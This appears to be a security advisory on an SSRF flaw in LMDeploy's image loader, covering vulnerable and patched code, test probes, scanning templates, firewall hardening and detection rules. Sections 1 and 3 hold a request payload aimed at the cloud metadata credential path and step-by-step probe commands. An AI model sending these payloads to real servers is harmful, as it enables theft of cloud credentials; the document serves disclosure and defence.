Executive Summary
A Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language image loader — tracked as CVE-2026-33626 — allows unauthenticated or low-privilege attackers to weaponize an AI model server's network identity, reaching internal services, cloud metadata endpoints, and IAM credential stores. First published in April 2026, the flaw was actively exploited in the wild within 13 hours of public disclosure, making this one of the fastest exploited AI infrastructure vulnerabilities on record. Organizations running LMDeploy for LLM inference — especially on cloud GPU instances — should patch to version 0.12.3 immediately.
1. What Is This Vulnerability?
LMDeploy is an open-source Python toolkit by InternLM for compressing, deploying, and serving large language models (LLMs). Its vision-language (VL) pipeline includes a helper function, load_image(), located in lmdeploy/vl/utils.py, that downloads images from URLs passed as part of a multimodal prompt.
The flaw: load_image() fetches arbitrary URLs with no validation of the destination IP address. No allowlist, no blocklist, no check for RFC1918 private ranges or link-local addresses. Whatever URL an attacker supplies, the model server will fetch it — and the response gets silently returned to the caller.
How the Vulnerable Code Looks
# VULNERABLE: lmdeploy/vl/utils.py (pre-0.12.3)
import requests
from PIL import Image
from io import BytesIO

def load_image(url: str) -> Image.Image:
    response = requests.get(url, timeout=10)  # No URL validation
    return Image.open(BytesIO(response.content))
An attacker providing a multimodal API request such as:
{
  "messages": [{
    "role": "user",
    "content": [
      {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}},
      {"type": "text", "text": "Describe this image."}
    ]
  }]
}
…receives the AWS Instance Metadata Service (IMDS) response embedded in the model's error output or streaming response. That path lists the name of the attached IAM role, and a follow-up request that appends the role name returns the temporary credentials, with no authentication bypass required.
Attack Vector
The attack surface is the model's public or internal API endpoint — any port exposing the LMDeploy OpenAI-compatible /v1/chat/completions route. The attacker:
- Sends a multimodal chat completion request with a crafted image_url pointing to an internal resource.
- The GPU server fetches the URL on the attacker's behalf.
- The HTTP response body is returned to the attacker (via error, streaming fragment, or image decode failure message).
- Targets include: AWS IMDS (169.254.169.254), GCP metadata (169.254.169.254/computeMetadata/v1/), Azure IMDS, internal Redis/MySQL hosts, secondary admin interfaces, and OOB DNS exfiltration endpoints.
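To make the target list concrete, here is a minimal sketch that labels an IP literal by the kind of network it belongs to, using only Python's standard `ipaddress` module. The function name `classify_target` is hypothetical and is not part of LMDeploy.

```python
import ipaddress

def classify_target(host: str) -> str:
    """Label an IP literal by the kind of network it belongs to."""
    ip = ipaddress.ip_address(host)
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"  # includes the 169.254.169.254 metadata address
    if ip.is_private:
        return "private"
    return "public"

if __name__ == "__main__":
    for host in ("169.254.169.254", "127.0.0.1", "10.0.0.5", "8.8.8.8"):
        print(host, classify_target(host))
```

Everything except the "public" label is a destination an image fetcher on an inference node would normally have no reason to contact.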
Real-World Impact
Sysdig's threat research team detected active exploitation of their honeypot within 12 hours and 31 minutes of CVE disclosure. The attacker was observed:
- Port-scanning the internal network behind the model server
- Querying the AWS IMDS to harvest IAM role credentials
- Reaching Redis and MySQL internal database ports
- Using an out-of-band DNS endpoint for blind data exfiltration
Because GPU inference nodes typically run with broad IAM roles (for model artifact S3 access, logging, etc.), a single successful IMDS fetch can pivot into full cloud account compromise.
2. Who Is Affected?
| Component | Affected Versions |
|---|---|
| lmdeploy (PyPI) | All versions < 0.12.3 |
| InternLM LMDeploy GitHub | All commits prior to the 0.12.3 release tag |
| Dockerized deployments | Any container image built from pre-0.12.3 source |
| Cloud GPU instances (AWS/GCP/Azure) | Highest risk — IMDS accessible by default |
| On-prem bare-metal deployments | Elevated risk if internal services are reachable |
You are NOT affected if:
- You are running LMDeploy ≥ 0.12.3
- You serve only text (non-VL) models with no vision pipeline loaded
- Your deployment is fully air-gapped with no outbound HTTP from the inference node
3. How to Detect It (Testing)
Manual Testing Steps
1. Identify the endpoint. Confirm the LMDeploy server is running and accepting multimodal requests:

        curl http://<host>:<port>/v1/models

   Look for a vision-capable model in the list (e.g., internlm-xcomposer, llava, etc.).

2. Set up a listener. Use a service like Burp Collaborator or interactsh to capture out-of-band requests:

        interactsh-client -v  # records DNS/HTTP callbacks

3. Send the SSRF probe. Submit a multimodal request with the OOB URL:

        curl -X POST http://<host>:<port>/v1/chat/completions \
          -H "Content-Type: application/json" \
          -d '{
            "model": "<vision-model-name>",
            "messages": [{
              "role": "user",
              "content": [
                {"type": "image_url", "image_url": {"url": "http://<your-interactsh-host>/ssrf-probe"}},
                {"type": "text", "text": "What is in this image?"}
              ]
            }]
          }'

4. Check for internal metadata access. On cloud instances, target the IMDS:

        # Replace image_url with: "http://169.254.169.254/latest/meta-data/"

   If the server response contains metadata text (AMI ID, IAM role name, etc.) in any part of the response body or error message, the server is vulnerable.

5. A positive result looks like: an HTTP callback recorded at your OOB listener, or metadata content reflected in the API error response.
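For repeated testing, the probe body and the check for a positive result can be scripted. This is a minimal sketch with hypothetical helper names; the marker strings are common AWS IMDS entries and are an assumption about what a reflected response might contain, not an exhaustive list.

```python
import json

# Strings that commonly appear in AWS IMDS listings (illustrative, not exhaustive).
METADATA_MARKERS = ("ami-id", "instance-id", "security-credentials")

def build_probe_payload(model: str, probe_url: str) -> str:
    """Build the JSON body for a multimodal request whose image URL is the probe."""
    body = {
        "model": model,
        "messages": [{
            "role": "user",
            "content": [
                {"type": "image_url", "image_url": {"url": probe_url}},
                {"type": "text", "text": "What is in this image?"},
            ],
        }],
    }
    return json.dumps(body)

def response_reflects_metadata(response_text: str) -> bool:
    """True if the API response appears to echo metadata content."""
    lowered = response_text.lower()
    return any(marker in lowered for marker in METADATA_MARKERS)
```

The payload string can be passed to `curl -d` or to any HTTP client. A reflection check like this complements, but does not replace, watching the OOB listener for callbacks.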
Automated Scanning
- Tool: Nuclei with a custom template
- Template Concept:

        id: CVE-2026-33626-lmdeploy-ssrf
        info:
          name: LMDeploy Vision-Language SSRF
          severity: high
        requests:
          - method: POST
            path:
              - "{{BaseURL}}/v1/chat/completions"
            headers:
              Content-Type: application/json
            body: |
              {"model":"{{model}}","messages":[{"role":"user","content":[
              {"type":"image_url","image_url":{"url":"http://{{interactsh-url}}"}},
              {"type":"text","text":"describe"}]}]}
            matchers:
              - type: word
                part: interactsh_protocol
                words:
                  - "http"

- Expected output: Interaction detected at the OOB callback host.
- Tool: Snyk, scanning the Python environment:

        snyk test --package-manager=pip
        # Look for: lmdeploy @ <0.12.3, SSRF (CVE-2026-33626)
Code Review Checklist
- Search codebase for requests.get(url) or urllib.request.urlopen(url) called with user-supplied input
- Verify load_image() or equivalent URL-fetching helpers validate destination IPs against a blocklist
- Confirm RFC1918 ranges (10.x, 172.16-31.x, 192.168.x), link-local (169.254.x.x), and loopback (127.x) are blocked
- Check that cloud metadata IP 169.254.169.254 is explicitly denied
- Ensure no partial URL content is reflected back in error messages (information disclosure)
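The first checklist item can be partly automated. The sketch below uses Python's `ast` module to list `requests.get`, `requests.post`, and `urllib.request.urlopen` calls whose first argument is not a string literal; the function name is hypothetical, and the check is only a heuristic that cannot tell whether a variable is actually attacker-controlled.

```python
import ast

# (object name, method name) pairs treated as outbound HTTP fetches.
FETCH_CALLS = {("requests", "get"), ("requests", "post"), ("request", "urlopen")}

def find_fetch_calls(source: str) -> list:
    """Return sorted (line, call) pairs for fetches with a non-literal first argument."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not isinstance(node.func, ast.Attribute):
            continue
        owner = node.func.value
        # `requests.get` has a Name owner; `urllib.request.urlopen` has an Attribute owner.
        owner_name = owner.id if isinstance(owner, ast.Name) else getattr(owner, "attr", None)
        if (owner_name, node.func.attr) not in FETCH_CALLS:
            continue
        first = node.args[0] if node.args else None
        if isinstance(first, ast.Constant) and isinstance(first.value, str):
            continue  # hard-coded URL, so not directly user-supplied
        hits.append((node.lineno, f"{owner_name}.{node.func.attr}"))
    return sorted(hits)
```

Each hit is a starting point for manual review: trace the argument back to its source and confirm that a destination check runs before the fetch.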
4. How to Fix It (Mitigation)
Step-by-Step Remediation
1. Upgrade LMDeploy immediately.

        pip install --upgrade "lmdeploy>=0.12.3"

   Verify:

        python -c "import lmdeploy; print(lmdeploy.__version__)"
        # Expected: 0.12.3 or higher

2. Rebuild Docker images if you maintain containerized deployments:

        # Update your requirements.txt or Dockerfile
        RUN pip install "lmdeploy>=0.12.3"

   Then rebuild and redeploy all running containers.

3. Rotate any credentials exposed during the window. If your server was running a vulnerable version and was internet-accessible, assume IMDS credentials were harvested. Rotate IAM roles, API keys, and service account tokens immediately.

4. Enable IMDSv2 on AWS EC2 instances to require token-based metadata requests (thwarts SSRF-based IMDS access even if SSRF exists):

        aws ec2 modify-instance-metadata-options \
          --instance-id <your-instance-id> \
          --http-tokens required \
          --http-endpoint enabled

5. Restrict outbound network egress from inference nodes using security groups, NACLs, or iptables rules so they can only reach necessary destinations (model storage, logging sinks).
Code Fix Example
The patched load_image() in 0.12.3 implements IP validation before fetching:
# PATCHED: lmdeploy/vl/utils.py (>= 0.12.3)
import ipaddress
import socket
import requests
from urllib.parse import urlparse
from PIL import Image
from io import BytesIO

BLOCKED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("169.254.0.0/16"),  # link-local / cloud IMDS
    ipaddress.ip_network("127.0.0.0/8"),     # loopback
    ipaddress.ip_network("::1/128"),
    ipaddress.ip_network("fc00::/7"),
]

def _is_safe_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    try:
        ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
    except (socket.gaierror, ValueError):
        return False
    return not any(ip in net for net in BLOCKED_NETWORKS)

def load_image(url: str) -> Image.Image:
    if not _is_safe_url(url):
        raise ValueError(f"Blocked URL (SSRF protection): {url}")
    response = requests.get(url, timeout=10)
    return Image.open(BytesIO(response.content))
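For teams writing their own URL-fetching helpers, a stricter variant of this check is sketched below. It is an illustration under stated assumptions, not the LMDeploy patch: the function names are hypothetical, it resolves every address (IPv4 and IPv6) with `socket.getaddrinfo`, and it accepts only globally routable unicast addresses instead of maintaining a blocklist.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_public_ip(text: str) -> bool:
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(text.split("%", 1)[0])  # drop any IPv6 zone id
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped  # judge ::ffff:a.b.c.d by its embedded IPv4 address
    return ip.is_global and not ip.is_multicast

def resolve_public_addresses(url: str) -> list:
    """Resolve a URL's host and return its addresses, or [] if any is internal."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return []
    try:
        port = parsed.port or (443 if parsed.scheme == "https" else 80)
        infos = socket.getaddrinfo(parsed.hostname, port, type=socket.SOCK_STREAM)
    except (socket.gaierror, ValueError, UnicodeError):
        return []
    addresses = sorted({info[4][0] for info in infos})
    # Reject the URL if even one resolved address is non-public.
    if not addresses or not all(is_public_ip(a) for a in addresses):
        return []
    return addresses
```

Two gaps remain with any resolve-then-fetch check. The HTTP client may resolve the hostname again and receive a different answer (DNS rebinding), and `requests.get` follows redirects by default, so each redirect target would need the same validation. Connecting to one of the returned addresses directly and disabling automatic redirects are common ways to close those gaps.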
Configuration Hardening
Beyond patching, harden the host environment:
# Block cloud metadata endpoint at iptables level (defense-in-depth)
iptables -A OUTPUT -d 169.254.169.254 -j DROP
ip6tables -A OUTPUT -d fd00:ec2::254 -j DROP  # AWS IMDS IPv6 endpoint; a blanket fe80::/10 drop would break IPv6 neighbor discovery
# Restrict outbound to required destinations only
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -d <model-storage-cidr> -j ACCEPT
iptables -A OUTPUT -j DROP
5. How to Test the Fix (Validation)
Regression Test Scenarios
- Scenario A: Upgraded to 0.12.3, send the SSRF probe from Step 3 and confirm no OOB callback is received and the API returns a ValueError/400 response.
- Scenario B: Send a legitimate multimodal request with a valid public image URL and confirm the model processes it normally (no regression in functionality).
- Scenario C: Attempt to fetch http://127.0.0.1:<internal-port>/ via the image URL and confirm it is blocked.
Security Test Cases
Test Case 1: SSRF probe no longer triggers
- Precondition: LMDeploy upgraded to ≥ 0.12.3
- Steps: Submit multimodal request with image_url=http://169.254.169.254/latest/meta-data/
- Expected Result: API returns HTTP 400 or 500 with a blocked/invalid URL error; no metadata content in response; no OOB callback recorded

Test Case 2: Private IP ranges blocked
- Precondition: LMDeploy ≥ 0.12.3
- Steps: Submit image_url=http://192.168.1.1/ and http://10.0.0.1/
- Expected Result: Both requests rejected before any outbound connection

Test Case 3: Legitimate image URL still works
- Precondition: LMDeploy ≥ 0.12.3, test with a known public image
- Steps: Submit image_url=https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_demonstration_1.png/280px-PNG_transparency_demonstration_1.png
- Expected Result: Model responds normally to the multimodal prompt
Automated Tests
# pytest security regression test
import pytest
import requests

LMDEPLOY_BASE = "http://localhost:23333"
VISION_MODEL = "internlm-xcomposer"

SSRF_URLS = [
    "http://169.254.169.254/latest/meta-data/",
    "http://127.0.0.1/",
    "http://10.0.0.1/",
    "http://192.168.1.1/",
    "http://172.16.0.1/",
]

@pytest.mark.parametrize("ssrf_url", SSRF_URLS)
def test_ssrf_blocked(ssrf_url):
    resp = requests.post(f"{LMDEPLOY_BASE}/v1/chat/completions", json={
        "model": VISION_MODEL,
        "messages": [{
            "role": "user",
            "content": [
                {"type": "image_url", "image_url": {"url": ssrf_url}},
                {"type": "text", "text": "describe"}
            ]
        }]
    })
    # Must not return 200 with content from internal resource
    assert resp.status_code in (400, 422, 500), f"Expected error for SSRF URL: {ssrf_url}"
    body = resp.text.lower()
    assert "iam" not in body
    assert "ami-id" not in body
    assert "security-credentials" not in body
6. Prevention & Hardening
Best Practices
- Validate all user-supplied URLs before making outbound HTTP requests in any server-side component. Never trust user input to determine fetch destinations.
- Apply defense-in-depth at the network layer. Even if application-level URL validation fails, a firewall rule blocking access to 169.254.169.254 and RFC1918 ranges provides a critical safety net.
- Pin AI/ML framework versions in your requirements.txt or pyproject.toml and automate dependency vulnerability scanning with Snyk, Dependabot, or OSV-Scanner in CI/CD.
- Enforce IMDSv2 everywhere. With tokens required, IMDSv2 demands a PUT pre-flight with a custom header, which a GET-only SSRF primitive like this one cannot issue, effectively neutering IMDS-targeting SSRF on AWS.
- Limit IAM permissions for inference nodes using least-privilege roles; they should not have iam:* or s3:* on all buckets.
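To illustrate why the IMDSv2 pre-flight blocks a GET-only fetcher, the sketch below builds (but does not send) the two requests of the IMDSv2 session flow with the standard library. The header names and token path follow AWS's documented IMDSv2 flow; the helper names are hypothetical.

```python
import urllib.request

IMDS_BASE = "http://169.254.169.254"

def build_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1: a PUT with a TTL header, which a plain image GET cannot produce."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )

def build_metadata_request(path: str, token: str) -> urllib.request.Request:
    """Step 2: a GET that must carry the session token from step 1."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/meta-data/{path.lstrip('/')}",
        headers={"X-aws-ec2-metadata-token": token},
    )
```

A helper such as the vulnerable `load_image()` can only issue a GET with no attacker-chosen headers, so it can complete neither step when tokens are required.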
Monitoring & Detection
Set up the following alerts to catch exploitation attempts in real time:
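# 1. Alert on outbound connections to 169.254.169.254 from inference hosts
# (CloudWatch Logs Insights query over VPC Flow Logs. VPC Flow Logs do not
# record instance metadata traffic, so rely on the host-level rules below for IMDS.)
filter dstAddr = "169.254.169.254" and srcAddr like /^10\./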
# 2. SIEM rule: HTTP request to internal RFC1918 from GPU node process
# (Falco rule for container workloads)
- rule: LMDeploy SSRF Attempt
  desc: Outbound connection to private/IMDS IP from lmdeploy process
  condition: >
    outbound and proc.name="python" and
    (fd.rip startswith "10." or
     fd.rip startswith "172.16." or
     fd.rip = "169.254.169.254")
  output: "Possible SSRF: %proc.name connecting to %fd.rip"
  priority: CRITICAL
# 3. Audit outbound connect() calls made by the Python interpreter
# (auditd rule; filter the resulting events for IMDS and internal destinations)
-a always,exit -F arch=b64 -S connect -F exe=/usr/bin/python3 -k ssrf_connect
Log aggregation: Forward inference node access logs to your SIEM and alert on:
- Any request body containing the string 169.254.169.254
- Unusually short image download times followed by large response payloads (possible metadata reflection)
- Requests to internal hostnames/IPs from the model API endpoint
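The first and third alert conditions can be approximated with a small log filter. This is a minimal sketch, assuming request bodies are logged as text lines; the function name and the hostname suffixes (`.internal`, `.local`) are illustrative assumptions to adapt to your environment.

```python
import ipaddress
import re
from urllib.parse import urlparse

URL_PATTERN = re.compile(r"https?://[^\s\"'<>\\]+")

def internal_urls_in(log_line: str) -> list:
    """Return URLs in a log line that point at non-public IPs or internal names."""
    flagged = []
    for url in URL_PATTERN.findall(log_line):
        try:
            host = urlparse(url).hostname
        except ValueError:
            continue  # malformed URL, e.g. an unterminated IPv6 literal
        if not host:
            continue
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            # Not an IP literal: fall back to a simple hostname heuristic.
            if host == "localhost" or host.endswith((".internal", ".local")):
                flagged.append(url)
            continue
        if not ip.is_global:
            flagged.append(url)
    return flagged
```

Hostnames that resolve to internal addresses are not caught by this string-level check, so it works best alongside the network-level alerts above.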
References
- CVE Entry: CVE-2026-33626 — NVD
- GitLab Advisory: CVE-2026-33626: LMDeploy SSRF via Vision-Language Image Loading
- Sysdig Analysis: CVE-2026-33626: How attackers exploited LMDeploy in 12 hours
- Hacker News Coverage: LMDeploy CVE-2026-33626 Flaw Exploited Within 13 Hours
- Vulert Write-up: LMDeploy CVE-2026-33626 — SSRF Flaw Exposes AI Infrastructure
- Tenable: CVE-2026-33626 Details
- Sentinel One DB: CVE-2026-33626: Internlm Lmdeploy SSRF
- Patch Release: LMDeploy v0.12.3 — PyPI